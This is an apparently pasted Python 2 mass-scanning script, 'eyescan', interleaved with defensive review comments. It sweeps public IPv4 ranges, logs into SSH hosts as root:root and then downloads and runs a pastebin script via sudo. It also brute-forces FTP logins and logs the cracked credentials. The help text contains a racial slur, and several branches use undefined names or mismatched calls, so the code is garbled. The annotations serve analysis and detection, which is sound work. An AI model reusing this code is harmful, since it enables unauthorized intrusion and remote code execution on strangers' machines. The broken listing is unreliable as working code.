- import sys
- import argparse
- from ftplib import FTP
- import random
- import socket
- import getpass
- import pxssh #make sure your pxssh is updated
- import subprocess
# Triage summary (review annotation): this listing is a Python 2 script
# (print statements, xrange) whose indentation was lost when the page was
# rendered; the leading "- " on every code line is a list marker, not part
# of the program. The statements after this banner select one of three modes
# from sys.argv[1]: --ssh-exploit, --titles, --ftp-brute. Each mode walks
# IPv4 space starting at a caller-supplied first octet and appends its
# results to files in the working directory (SSH.txt, root_logins.txt,
# webdb, ftp-logins.txt); those files are the artifacts to look for on a
# host suspected of having run it.
- print "\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
- print " |----MASS SCANNING: EYE-SCAN BY EYEZIK----|"
- print " +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
- print "\n ./eyescan.py -h"
- if (sys.argv[1] == "-h"):
- print "\n more help --help\n --ssh-exploit (start ip: 1) \n --titles (start ip)\n --ftp-brute (start ip) -u USERNAME -p (word list)\n example: ./eyescan.py --ssh-exploit 101\n"
- elif (sys.argv[1] == "--help"):
- print "\n --ssh-exploit (start ip: 1) \n --titles (start ip)\n --ftp-brute\n -R root (will use login root:root)\n -u username(not needed if -R)\n -p password list /root/nigger.txt (not needed if -R)\n example: ./eyescan.py --ssh-exploit 101\n"
- else:
# --ssh-exploit mode. As written it enumerates a.b.c.d with a running from
# int(sys.argv[2]) to 254 and b, c, d from 0 to 254 (xrange excludes 255),
# drops the ranges tested below, and probes every remaining address.
# Network-side signal: 0.5 s-timeout TCP connects from one source to
# sequentially increasing addresses.
- if (sys.argv[1] == "--ssh-exploit"):
- print("\n [~] SSH SCAN/EXPLOIT [~]\n ")
- STRTIP = (sys.argv[2])
- for p in xrange(int(STRTIP),255):
- for q in xrange(0,255):
- for r in xrange(0,255):
- for s in xrange(0,255):
- ip = str(p) + "." + str(q) + "." + str(r) + "." + str(s)
# Exclusion list: an address matching any test is replaced by the sentinel
# string "null" and skipped. The tests resemble the private, shared,
# link-local, documentation and reserved ranges that the other two modes
# label in their comments; this copy carries an extra test (p 0-15 with
# q 0-20) that the other copies do not have.
- if (p==10 or p==127):
- ip = "null"
- elif (p == 100 and q >= 64 and q <= 127):
- ip = "null"
- elif (p >= 0 and p <= 15 and q >= 0 and q <= 20):
- ip = "null"
- elif (p == 169 and q == 254):
- ip = "null"
- elif (p == 172 and q >= 16 and q <= 31):
- ip = "null"
- elif (p == 192 and q == 0 and r == 0):
- ip = "null"
- elif (p == 192 and q == 0 and r == 2):
- ip = "null"
- elif (p == 192 and q == 88 and r == 99):
- ip = "null"
- elif (p == 192 and q == 168):
- ip = "null"
- elif (p == 192 and q == 18):
- ip = "null"
- elif (p == 192 and q == 19):
- ip = "null"
- elif (p == 192 and q == 51 and r == 100):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p == 203 and r == 113):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p >= 224):
- # RFC5737: Reserved D & E
- ip = "null"
- if (ip != "null"):
- print ip
- try:
# range(21, 22) yields only port 21, so the probe this mode puts on the wire
# is a TCP connect to port 21 even though the message below is labelled SSH.
- for port in range (21, 22):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(0.5)
- result = sock.connect_ex((ip, port))
- if result == 0:
- print "SSH FOUND {}".format(ip, port)
- try:
# A responsive address is appended to SSH.txt before any login is attempted.
- f = open("SSH.txt","a")
- f.write(ip)
- f.write("\n")
- f.close()
# Login attempt with the fixed pair root/root. StrictHostKeyChecking=no is
# appended to the ssh options, so the remote host key is never verified.
# Defensive relevance: a host that refuses password login for root
# (sshd_config PermitRootLogin / PasswordAuthentication) or carries no
# default credential does not get past this step.
- s = pxssh.pxssh()
- s.SSH_OPTS += " -o StrictHostKeyChecking=no"
- hostname = ip
- username = ('root')
- password = ('root')
- s.login(hostname, username, password)
# NOTE(review): from here to the 'Wrong password' raise the lines use self,
# original_prompt, TIMEOUT, login_timeout, terminal_type and ExceptionPxssh,
# none of which this listing defines. They look like text copied out of a
# pxssh login routine (unconfirmed). Treat the listing as a pasted fragment,
# not as a verified working sample.
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT, "(?i)connection closed by remote host"], timeout=login_timeout)
- if i==0:
- self.sendline("yes")
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
- if i==2:
- self.sendline(password)
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
- if i==4:
- self.sendline(terminal_type)
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
- if i==0:
- self.close()
- raise ExceptionPxssh('Weird error. Got "are you sure" prompt twice.')
- elif i==1:
- pass
- elif i==2:
- self.close()
- raise ExceptionPxssh('Wrong password')
- else:
# Post-login stage: three commands are sent over the session. They fetch a
# script from the pastebin raw URL below into groovy.sh, chmod it 777, and
# run it, each through sudo. Host-side indicators taken from these lines:
# a password login as root followed by `curl -L` to pastebin.com/raw, a
# world-writable groovy.sh in the login directory, and its execution via
# sudo. The content of the fetched script is not shown on this page.
- s.sendline('sudo curl -L https://pastebin.com/raw/ArHqXVnU -o groovy.sh')
- s.prompt()
- s.sendline('sudo chmod 777 groovy.sh')
- s.prompt()
- s.sendline('sudo ./groovy.sh')
- s.prompt()
# The address is then recorded in root_logins.txt on the scanning host.
- f = open("root_logins.txt","a")
- f.write(ip)
- f.write("\n")
- f.close()
- s.logout()
- except pxssh.ExceptionPxssh as e:
- print("ssh failed on login.")
- print(e)
- sock.close()
- except socket.error:
- print "Couldn't connect to server"
- except socket.gaierror:
- print 'Hostname could not be resolved. Exiting'
# --titles mode: walks addresses from int(sys.argv[2]) upward with the
# exclusion tests below, then fetches the HTML title of every address that
# answers the TCP probe.
- if (sys.argv[1] == "--titles"):
- STRTIP = (sys.argv[2])
- print("\n [~] SCANNING TITLES [~]\n ")
- for p in xrange(int(STRTIP),255):
- for q in xrange(0,255):
- for r in xrange(0,255):
- for s in xrange(0,255):
- ip = str(p) + "." + str(q) + "." + str(r) + "." + str(s)
# An address matching any test is replaced by the sentinel "null" and skipped.
- if (p==10 or p==127):
- #Private IP and Loopback IP
- ip = "null"
- elif (p == 100 and q >= 64 and q <= 127):
- #Shared Address Space
- ip = "null"
- elif (p == 169 and q == 254):
- # APIPA
- ip = "null"
- elif (p == 172 and q >= 16 and q <= 31):
- #Private IP 172.16.0.0 - 172.31.255.255
- ip = "null"
- elif (p == 192 and q == 0 and r == 0):
- #192.0.0.0/24 # RFC6890: IETF Protocol Assignments
- ip = "null"
- elif (p == 192 and q == 0 and r == 2):
- #192.0.2.0/24 # RFC5737: Documentation (TEST-NET-1)
- ip = "null"
- elif (p == 192 and q == 88 and r == 99):
- #192.88.99.0/24 # RFC3068: 6to4 Relay Anycast
- ip = "null"
- elif (p == 192 and q == 168):
- #RFC1918: Private-Use
- ip = "null"
- elif (p == 192 and q == 18):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 19):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 51 and r == 100):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p == 203 and r == 113):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p >= 224):
- # RFC5737: Reserved D & E
- ip = "null"
- if (ip != "null"):
- print "scanning: {} ".format(ip)
- try:
# range(79, 81) yields ports 79 and 80; each gets a 0.5 s TCP connect.
- for port in range (79, 81):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(0.5)
- result = sock.connect_ex((ip, port))
- if result == 0:
- #print "PORT OPEN ON {}".format(ip, port)
- try:
# On an open port the script requests http://<ip> (the URL carries no port,
# whichever port answered) and reads the title element through
# BeautifulSoup. NOTE(review): neither requests nor BeautifulSoup appears
# in the import lines shown on this page. No request headers are set, so a
# server would presumably log the HTTP library's default User-Agent;
# confirm against captured traffic before using it as a signature.
- ipurl = ('http://' + ip)
- print(ipurl)
- sock.settimeout(0.5)
- rq = requests.get(ipurl)
- soup = BeautifulSoup(str(rq.content))
- t = 'title'
- datitle = getattr(soup, t)
- print(datitle)
# One "ip title" line per responding host is appended to the file webdb.
- f = open("webdb","a")
- f.write(ip)
- f.write(" ")
- f.write(str(datitle))
- f.write("\n")
- f.close()
- sock.close()
- except socket.error as e:
- print("Couldn't connect to server")
- print(e)
- sock.close()
- except socket.gaierror:
- print 'Hostname could not be resolved. Exiting'
# --ftp-brute mode: walks addresses from int(sys.argv[2]) upward with the
# exclusion tests below, then attempts anonymous and wordlist-driven FTP
# logins against every address that answers the TCP probe.
- if (sys.argv[1] == "--ftp-brute"):
- STRTIP = (sys.argv[2])
- print("\n [~] FTP BRUTE FORCE SCAN [~]\n ")
- for p in xrange(int(STRTIP),255):
- for q in xrange(0,255):
- for r in xrange(0,255):
- for s in xrange(0,255):
- ip = str(p) + "." + str(q) + "." + str(r) + "." + str(s)
# An address matching any test is replaced by the sentinel "null" and skipped.
- if (p==10 or p==127):
- #Private IP and Loopback IP
- ip = "null"
- elif (p == 100 and q >= 64 and q <= 127):
- #Shared Address Space
- ip = "null"
- elif (p == 169 and q == 254):
- # APIPA
- ip = "null"
- elif (p == 172 and q >= 16 and q <= 31):
- #Private IP 172.16.0.0 - 172.31.255.255
- ip = "null"
- elif (p == 192 and q == 0 and r == 0):
- #192.0.0.0/24 # RFC6890: IETF Protocol Assignments
- ip = "null"
- elif (p == 192 and q == 0 and r == 2):
- #192.0.2.0/24 # RFC5737: Documentation (TEST-NET-1)
- ip = "null"
- elif (p == 192 and q == 88 and r == 99):
- #192.88.99.0/24 # RFC3068: 6to4 Relay Anycast
- ip = "null"
- elif (p == 192 and q == 168):
- #RFC1918: Private-Use
- ip = "null"
- elif (p == 192 and q == 18):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 19):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 51 and r == 100):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p == 203 and r == 113):
- ip = "null"
- elif (p >= 224):
- # RFC5737: Reserved D & E
- ip = "null"
- if (ip != "null"):
- print "scanning: {} ".format(ip)
- try:
# range(20, 21) yields only port 20 for the TCP probe (0.9 s timeout); the
# FTP(ip) calls further down pass no port and so use ftplib's default
# control port, 21.
- for port in range (20, 21):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(0.9)
- result = sock.connect_ex((ip, port))
- if result == 0:
- print "PORT OPEN ON {}".format(ip, port)
- try:
# Three helpers are declared inline. Each wraps its body in a bare except,
# so a refused login or a network error is discarded silently, or, in
# brute_force, reported as a missing wordlist file.
# check_anonymous_login: a single login() with no credentials.
- def check_anonymous_login(ip):
- try:
- ftp = FTP(ip)
- ftp.login()
- print "\n[+] Anonymous login is open."
- print "\n User:pass = anonymous:anonymous"
- ftp.quit()
- except:
- pass
# ftp_login: one login attempt; on success the address and the working
# username:password pair are appended in clear text to ftp-logins.txt.
- def ftp_login(ip, username, password):
- try:
- ftp = FTP(ip)
- ftp.login(username, password)
- ftp.quit()
- print "\nLogged in"
- print "\nUsername : {}".format(username)
- print "\nPassword : {}".format(password)
- f = open("ftp-logins.txt","a")
- f.write(ip)
- f.write(" ")
- f.write(str(username))
- f.write(":")
- f.write(str(password))
- f.write("\n")
- f.close()
- except:
- pass
# brute_force: reads the whole wordlist file and passes each stripped line
# to ftp_login as the password for one username. Server-side signal: many
# failed USER/PASS exchanges from one client in quick succession.
# Per-source attempt limits and disabling anonymous access counter the two
# login helpers.
- def brute_force(username, wordlist):
- try:
- wordlist = open(wordlist, "r")
- words = wordlist.readlines()
- for word in words:
- word = word.strip()
- ftp_login(ip, username, word)
- except:
- print "\n[-] There is no such wordlist file. \n"
# NOTE(review): the option parsing and the two calls after it use names and
# argument counts that do not match the helper definitions above, so this
# branch reads as an unfinished paste rather than a verified working sample.
- parser = argparse.ArgumentParser()
- parser.add_argument("-R", "-u", "--username")
- parser.add_argument("-R", "-p", "--wordlist")
- args = parser.parse_args()
- username = args.username
- wordlist = args.wordlist
- brute_force(ip, username, wordlist)
- check_anonymous_login(target)
- print "\n[-] Brute force finished. \n"
- sock.close()
- except socket.error as e:
- print("Couldn't connect to server")
- print(e)
- sock.close()
- except socket.gaierror:
- print 'Hostname could not be resolved. Exiting'